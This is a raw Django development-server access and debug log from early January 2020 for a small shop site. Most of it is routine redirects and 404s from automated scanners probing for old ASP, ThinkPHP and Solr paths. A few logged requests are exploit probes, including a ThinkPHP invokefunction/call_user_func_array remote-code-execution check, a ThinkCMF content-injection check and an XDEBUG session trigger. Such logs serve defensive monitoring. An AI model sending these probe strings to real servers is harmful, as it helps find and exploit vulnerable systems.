"GET /dyzl/Print.asp?ArticleID=443 HTTP/1.0" 404 6367 Not Found: /dyzl/Print.asp [04/Jan/2020 15:03:53] "GET /dyzl/Print.asp?ArticleID=453 HTTP/1.0" 404 6367 Not Found: /dyzl/Print.asp [04/Jan/2020 15:04:06] "GET /dyzl/Print.asp?ArticleID=466 HTTP/1.0" 404 6367 Not Found: /dyzl/Print.asp [04/Jan/2020 15:04:16] "GET /dyzl/Print.asp?ArticleID=499 HTTP/1.0" 404 6367 Not Found: /dyzl/Print.asp [04/Jan/2020 15:04:26] "GET /dyzl/Print.asp?ArticleID=502 HTTP/1.0" 404 6367 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:04:34] "GET /dyzl/SendMail.asp?ArticleID=118 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:04:45] "GET /dyzl/SendMail.asp?ArticleID=122 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:05:01] "GET /dyzl/SendMail.asp?ArticleID=123 HTTP/1.0" 404 6376 [04/Jan/2020 15:05:03] "GET / HTTP/1.0" 302 0 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:05:20] "GET /dyzl/SendMail.asp?ArticleID=124 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:05:30] "GET /dyzl/SendMail.asp?ArticleID=125 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:05:42] "GET /dyzl/SendMail.asp?ArticleID=126 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:05:59] "GET /dyzl/SendMail.asp?ArticleID=127 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:06:15] "GET /dyzl/SendMail.asp?ArticleID=128 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:06:25] "GET /dyzl/SendMail.asp?ArticleID=129 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:06:39] "GET /dyzl/SendMail.asp?ArticleID=131 HTTP/1.0" 404 6376 Not Found: /dyzl/SendMail.asp [04/Jan/2020 15:06:54] "GET /dyzl/SendMail.asp?ArticleID=132 HTTP/1.0" 404 6376 [04/Jan/2020 15:10:05] "GET / HTTP/1.0" 302 0 [04/Jan/2020 15:15:08] "GET / HTTP/1.0" 302 0 [04/Jan/2020 15:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 15:24:16] "GET / HTTP/1.0" 302 0 [04/Jan/2020 15:28:06] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 15:28:37] "GET /xyzx/ShowArticle.asp?ArticleID=434 HTTP/1.0" 404 6385 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 15:28:40] "GET /aqgl/ShowArticle.asp?ArticleID=136 HTTP/1.0" 404 6385 [04/Jan/2020 15:30:19] "GET /Guestbook HTTP/1.0" 301 0 [04/Jan/2020 15:30:23] "GET /aqgl HTTP/1.0" 301 0 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 15:31:53] "GET /xyzx/ShowArticle.asp?ArticleID=473 HTTP/1.0" 404 6385 [04/Jan/2020 15:33:09] "GET / HTTP/1.0" 302 0 Not Found: /ShowAuthor.asp [04/Jan/2020 15:34:17] "GET /ShowAuthor.asp?ChannelID=1009&AuthorName=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C4%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%C3%BB%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D3%B0%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD HTTP/1.0" 404 6618 Not Found: /newslist.asp [04/Jan/2020 15:36:42] "GET /newslist.asp?type=4&id=1072 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 15:36:44] "GET /newslist.asp?type=4&id=1092 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 15:36:45] "GET /newslist.asp?type=4&id=1714 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 15:36:46] "GET /newslist.asp?type=4&id=912 HTTP/1.0" 404 6365 Not Found: /dtgh/ShowArticle.asp [04/Jan/2020 15:38:08] "GET /dtgh/ShowArticle.asp?ArticleID=495 HTTP/1.0" 404 6385 [04/Jan/2020 15:38:12] "GET / HTTP/1.0" 302 0 [04/Jan/2020 15:43:15] "GET / HTTP/1.0" 302 0 [04/Jan/2020 15:53:16] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:00:01] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-04 16:13:20,641 utils 27361 140408453592832 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'guestbook'; args=('guestbook',) Not Found: /guestbook/ [04/Jan/2020 16:13:20] "GET /guestbook/ HTTP/1.0" 404 1735 Not Found: /dyzl/ShowClass.asp [04/Jan/2020 16:13:33] "GET /dyzl/ShowClass.asp?ClassID=21 HTTP/1.0" 404 6376 [04/Jan/2020 16:13:46] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/UploadFiles_7376/201609/2016091212240540.jpg [04/Jan/2020 16:13:47] "GET /xyzx/UploadFiles_7376/201609/2016091212240540.jpg HTTP/1.0" 404 6458 Not Found: /aqgl/Comment.asp [04/Jan/2020 16:17:07] "GET /aqgl/Comment.asp?ArticleID=399 HTTP/1.0" 404 6373 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 16:17:11] "GET /aqgl/ShowArticle.asp?ArticleID=121 HTTP/1.0" 404 6385 Not Found: /xyzx/Print.asp [04/Jan/2020 16:17:13] "GET /xyzx/Print.asp?ArticleID=328 HTTP/1.0" 404 6367 [04/Jan/2020 16:18:48] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowArticle.asp [04/Jan/2020 16:19:59] "GET /xsyd/ShowArticle.asp?ArticleID=465 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 16:23:19] "GET /xyzx/ShowArticle.asp?ArticleID=503 HTTP/1.0" 404 6385 [04/Jan/2020 16:23:51] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:28:53] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:32:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:33:56] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:38:59] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:47:00] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:52:02] "GET / HTTP/1.0" 302 0 [04/Jan/2020 16:57:05] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/UploadFiles_7376/201609/2016091212190145.jpg [04/Jan/2020 16:57:57] "GET /xyzx/UploadFiles_7376/201609/2016091212190145.jpg HTTP/1.0" 404 6458 Not Found: /newslist.asp [04/Jan/2020 16:58:04] "GET /newslist.asp?type=4&id=1710 HTTP/1.0" 404 6366 [04/Jan/2020 17:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:10:06] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:15:09] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:29:23] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:34:26] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:42:23] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:47:26] "GET / HTTP/1.0" 302 0 [04/Jan/2020 17:52:28] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [04/Jan/2020 17:53:55] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /bmxx/ShowArticle.asp [04/Jan/2020 17:56:12] "GET /bmxx/ShowArticle.asp?ArticleID=353 HTTP/1.0" 404 6385 [04/Jan/2020 17:57:31] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/Comment.asp [04/Jan/2020 17:57:50] "GET /xyzx/Comment.asp?ArticleID=463 HTTP/1.0" 404 6373 Not Found: /newslist.asp [04/Jan/2020 17:59:38] "GET /newslist.asp?type=4&id=1725 HTTP/1.0" 404 6366 [04/Jan/2020 18:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:10:05] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:15:08] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:25:14] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:30:17] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:35:19] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:42:14] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:47:35] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:52:38] "GET / HTTP/1.0" 302 0 [04/Jan/2020 18:57:41] "GET / HTTP/1.0" 302 0 Not Found: /aqgl/ShowArticle.asp [04/Jan/2020 19:00:25] "GET /aqgl/ShowArticle.asp?ArticleID=33 HTTP/1.0" 404 6384 Not Found: /newslist.asp [04/Jan/2020 19:01:56] "GET /newslist.asp?type=4&id=1711 HTTP/1.0" 404 6366 Not Found: /dtgh/ShowClass.asp [04/Jan/2020 19:02:19] "GET /dtgh/ShowClass.asp?ClassID=9 HTTP/1.0" 404 6375 Not Found: /newslist.asp [04/Jan/2020 19:02:21] "GET /newslist.asp?type=1&?id=40000 HTTP/1.0" 404 6368 [04/Jan/2020 19:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:10:06] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [04/Jan/2020 19:12:22] "GET /robots.txt HTTP/1.0" 404 6341 [04/Jan/2020 19:12:23] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:15:09] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:25:14] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:33:31] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:38:34] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:43:37] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowArticle.asp [04/Jan/2020 19:45:27] "GET /xsyd/ShowArticle.asp?ArticleID=407 HTTP/1.0" 404 6385 Not Found: /newslist.asp [04/Jan/2020 19:46:58] "GET /newslist.asp?type=4&id=1401 HTTP/1.0" 404 6366 [04/Jan/2020 19:48:40] "GET / HTTP/1.0" 302 0 [04/Jan/2020 19:57:41] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:06:40] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-04 20:06:40,212 utils 27361 140408453592832 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jxvaq9uz34kgpfggw19lqy4v6pmnxtot' LIMIT 1; args=('jxvaq9uz34kgpfggw19lqy4v6pmnxtot',) DEBUG 2020-01-04 20:06:40,214 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jxvaq9uz34kgpfggw19lqy4v6pmnxtot', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-18T20:06:40.212824+00:00'::timestamptz); args=('jxvaq9uz34kgpfggw19lqy4v6pmnxtot', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 18, 20, 6, 40, 212824, tzinfo=)) [04/Jan/2020 20:06:40] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Jan/2020 20:10:05] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:15:08] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:25:17] "GET / HTTP/1.0" 302 0 Not Found: /aqgl/SendMail.asp [04/Jan/2020 20:29:42] "GET /aqgl/SendMail.asp?ArticleID=240 HTTP/1.0" 404 6376 Not Found: /xyzx/Comment.asp [04/Jan/2020 20:29:45] "GET /xyzx/Comment.asp?ArticleID=326 HTTP/1.0" 404 6373 [04/Jan/2020 20:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [04/Jan/2020 20:30:20] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/ShowClass.asp [04/Jan/2020 20:30:32] "GET /xsyd/ShowClass.asp?ClassID=30 HTTP/1.0" 404 6376 Not Found: /bmxx/SendMail.asp [04/Jan/2020 20:31:02] "GET /bmxx/SendMail.asp?ArticleID=250 HTTP/1.0" 404 6376 Not Found: /bmxx/ShowArticle.asp [04/Jan/2020 20:31:44] "GET /bmxx/ShowArticle.asp?ArticleID=457 HTTP/1.0" 404 6385 Not Found: /newslist.asp [04/Jan/2020 20:32:53] "GET /newslist.asp?type=4&id=1712 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 20:33:10] "GET /newslist.asp?type=1&id=98800 HTTP/1.0" 404 6367 Not Found: /jspd/ShowArticle.asp [04/Jan/2020 20:34:57] "GET /jspd/ShowArticle.asp?ArticleID=296 HTTP/1.0" 404 6385 [04/Jan/2020 20:35:23] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:40:26] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:45:29] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:50:32] "GET / HTTP/1.0" 302 0 [04/Jan/2020 20:55:35] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:01:31] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:10:04] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:15:07] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/SendMail.asp [04/Jan/2020 21:15:08] "GET /xyzx/SendMail.asp?ArticleID=472 HTTP/1.0" 404 6376 Not Found: /xsyd/ShowArticle.asp [04/Jan/2020 21:15:51] "GET /xsyd/ShowArticle.asp?ArticleID=422 HTTP/1.0" 404 6385 [04/Jan/2020 21:16:33] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [04/Jan/2020 21:17:33] "GET /newslist.asp?type=4&id=1707 HTTP/1.0" 404 6366 Not Found: /User/User_Favorite.asp [04/Jan/2020 21:17:49] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1008&InfoID=271 HTTP/1.0" 404 6422 [04/Jan/2020 21:20:10] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:25:13] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:30:16] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:38:42] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:43:45] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:48:48] "GET / HTTP/1.0" 302 0 [04/Jan/2020 21:54:59] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:00:02] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:10:06] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 22:15:05] "GET /xyzx/ShowArticle.asp?ArticleID=463 HTTP/1.0" 404 6385 Not Found: /jspd/ShowArticle.asp [04/Jan/2020 22:15:08] "GET /jspd/ShowArticle.asp?ArticleID=271 HTTP/1.0" 404 6385 Not Found: /001565123456.cfg [04/Jan/2020 22:15:29] "GET /001565123456.cfg HTTP/1.0" 404 6358 Not Found: /dyzl/ShowArticle.asp [04/Jan/2020 22:15:31] "GET /dyzl/ShowArticle.asp?ArticleID=499 HTTP/1.0" 404 6385 Not Found: /xsyd/ShowArticle.asp [04/Jan/2020 22:15:33] "GET /xsyd/ShowArticle.asp?ArticleID=267 HTTP/1.0" 404 6385 Not Found: /User/User_Favorite.asp [04/Jan/2020 22:15:45] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1009&InfoID=513 HTTP/1.0" 404 6422 [04/Jan/2020 22:17:25] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/Print.asp [04/Jan/2020 22:19:29] "GET /bmxx/Print.asp?ArticleID=469 HTTP/1.0" 404 6367 [04/Jan/2020 22:22:28] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [04/Jan/2020 22:25:17] "GET /newslist.asp?type=4&id=1315 HTTP/1.0" 404 6366 [04/Jan/2020 22:27:31] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:27:36] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:36:26] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:41:29] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:46:32] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:51:35] "GET / HTTP/1.0" 302 0 [04/Jan/2020 22:56:38] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:00:06] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-04 23:00:07,120 utils 27361 140408453592832 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'fcdgbk3reh194nwoi9d19cq00eel13lb' LIMIT 1; args=('fcdgbk3reh194nwoi9d19cq00eel13lb',) DEBUG 2020-01-04 23:00:07,121 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('fcdgbk3reh194nwoi9d19cq00eel13lb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-18T23:00:07.120469+00:00'::timestamptz); args=('fcdgbk3reh194nwoi9d19cq00eel13lb', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 18, 23, 0, 7, 120469, tzinfo=)) [04/Jan/2020 23:00:07] "GET /login/?next=/ HTTP/1.0" 200 1786 [04/Jan/2020 23:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:10:06] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 23:15:03] "GET /xyzx/ShowArticle.asp?ArticleID=484 HTTP/1.0" 404 6385 [04/Jan/2020 23:15:09] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:16:45] "GET /dtgh HTTP/1.0" 301 0 Not Found: /bmxx/ShowArticle.asp [04/Jan/2020 23:18:05] "GET /bmxx/ShowArticle.asp?ArticleID=350 HTTP/1.0" 404 6385 Not Found: /xyzx/SendMail.asp [04/Jan/2020 23:18:11] "GET /xyzx/SendMail.asp?ArticleID=484 HTTP/1.0" 404 6376 [04/Jan/2020 23:20:11] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [04/Jan/2020 23:23:02] "GET /newslist.asp?type=4&id=939 HTTP/1.0" 404 6365 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 23:23:29] "GET /xyzx/ShowArticle.asp?ArticleID=334 HTTP/1.0" 404 6385 [04/Jan/2020 23:28:32] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:33:35] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:38:38] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:45:13] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:50:16] "GET / HTTP/1.0" 302 0 [04/Jan/2020 23:57:20] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/ShowArticle.asp [04/Jan/2020 23:58:26] "GET /bmxx/ShowArticle.asp?ArticleID=250 HTTP/1.0" 404 6385 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 23:58:29] "GET /xyzx/ShowArticle.asp?ArticleID=246 HTTP/1.0" 404 6385 Not Found: /dyzl/UploadFiles_3009/201701/2017010614453479.jpg [04/Jan/2020 23:58:33] "GET /dyzl/UploadFiles_3009/201701/2017010614453479.jpg HTTP/1.0" 404 6458 Not Found: /bmxx/Comment.asp [05/Jan/2020 00:01:46] "GET /bmxx/Comment.asp?ArticleID=250 HTTP/1.0" 404 6373 Not Found: /xyzx/Print.asp [05/Jan/2020 00:01:48] "GET /xyzx/Print.asp?ArticleID=264 HTTP/1.0" 404 6367 [05/Jan/2020 00:05:02] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:05:19] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [05/Jan/2020 00:07:26] "GET /newslist.asp?type=4&id=1701 HTTP/1.0" 404 6366 Not Found: /newslist.asp [05/Jan/2020 00:08:04] "GET /newslist.asp?type=1&?id=50000 HTTP/1.0" 404 6368 [05/Jan/2020 00:10:05] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:17:22] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:22:24] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:27:27] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:32:29] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:32:54] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:41:06] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:46:09] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:51:11] "GET / HTTP/1.0" 302 0 [05/Jan/2020 00:57:42] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:05:03] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:10:05] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:15:08] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:20:35] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:25:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Jan/2020 01:27:48] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [05/Jan/2020 01:32:39] "GET /TP/public/index.php HTTP/1.0" 404 6367 Not Found: /TP/index.php [05/Jan/2020 01:32:40] "GET /TP/index.php HTTP/1.0" 404 6346 Not Found: /thinkphp/html/public/index.php [05/Jan/2020 01:32:40] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6400 Not Found: /html/public/index.php [05/Jan/2020 01:32:41] "GET /html/public/index.php HTTP/1.0" 404 6373 Not Found: /public/index.php [05/Jan/2020 01:32:41] "GET /public/index.php HTTP/1.0" 404 6358 Not Found: /TP/html/public/index.php [05/Jan/2020 01:32:42] "GET /TP/html/public/index.php HTTP/1.0" 404 6382 Not Found: /elrekt.php [05/Jan/2020 01:32:42] "GET /elrekt.php HTTP/1.0" 404 6340 Not Found: /index.php [05/Jan/2020 01:32:43] "GET /index.php HTTP/1.0" 404 6337 [05/Jan/2020 01:32:43] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-05 01:32:44,515 utils 27361 140408453592832 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'jdvs766o8l2ir0g7ppkm51mz51jvet7g' LIMIT 1; args=('jdvs766o8l2ir0g7ppkm51mz51jvet7g',) DEBUG 2020-01-05 01:32:44,516 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('jdvs766o8l2ir0g7ppkm51mz51jvet7g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-19T01:32:44.515468+00:00'::timestamptz); args=('jdvs766o8l2ir0g7ppkm51mz51jvet7g', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 19, 1, 32, 44, 515468, tzinfo=)) [05/Jan/2020 01:32:44] "GET /login/?next=/ HTTP/1.0" 200 1786 [05/Jan/2020 01:32:50] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:37:53] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:42:55] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:47:58] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:53:01] "GET / HTTP/1.0" 302 0 [05/Jan/2020 01:58:04] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:05:03] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:07:16] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:10:06] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:15:08] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:20:11] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:22:09] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:24:55] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:28:55] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:36:57] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:42:03] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:47:06] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:52:09] "GET / HTTP/1.0" 302 0 [05/Jan/2020 02:57:12] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:05:02] "GET / HTTP/1.0" 302 0 Not Found: /solr/admin/info/system [05/Jan/2020 03:06:28] "GET /solr/admin/info/system?wt=json HTTP/1.0" 404 6384 [05/Jan/2020 03:10:05] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:15:08] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:20:11] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:24:03] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [05/Jan/2020 03:24:03] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.0" 302 0 DEBUG 2020-01-05 03:24:03,887 utils 27361 140408453592832 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = '9a157h20rew45mnwqc1csrs6qd4i2hjy' LIMIT 1; args=('9a157h20rew45mnwqc1csrs6qd4i2hjy',) DEBUG 2020-01-05 03:24:03,889 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('9a157h20rew45mnwqc1csrs6qd4i2hjy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-19T03:24:03.888356+00:00'::timestamptz); args=('9a157h20rew45mnwqc1csrs6qd4i2hjy', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 19, 3, 24, 3, 888356, tzinfo=)) [05/Jan/2020 03:24:03] "GET /login/?next=/%3Fa%3Dfetch%26content%3D%253Cphp%253Edie%28%40md5%28HelloThinkCMF%29%29%253C/php%253E HTTP/1.0" 200 1936 DEBUG 2020-01-05 03:24:04,170 utils 27361 140408453592832 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'aqrd4gf80ae2c1uc9ui9od08qv46vshz' LIMIT 1; args=('aqrd4gf80ae2c1uc9ui9od08qv46vshz',) DEBUG 2020-01-05 03:24:04,172 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('aqrd4gf80ae2c1uc9ui9od08qv46vshz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-19T03:24:04.171221+00:00'::timestamptz); args=('aqrd4gf80ae2c1uc9ui9od08qv46vshz', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 19, 3, 24, 4, 171221, tzinfo=)) [05/Jan/2020 03:24:04] "GET /login/?next=/%3FXDEBUG_SESSION_START%3Dphpstorm HTTP/1.0" 200 1850 [05/Jan/2020 03:25:13] "GET / HTTP/1.0" 302 0 Not Found: /index.php [05/Jan/2020 03:26:02] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.0" 404 6454 [05/Jan/2020 03:30:16] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:35:18] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:40:21] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:45:24] "GET / HTTP/1.0" 302 0 [05/Jan/2020 03:50:42] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:00:02] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:05:03] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:06:30] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:10:06] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:15:09] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:20:01] "GET /whm-server-status HTTP/1.0" 301 0 [05/Jan/2020 04:20:11] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:25:14] "GET / HTTP/1.0" 302 0 [05/Jan/2020 04:30:17] "GET / 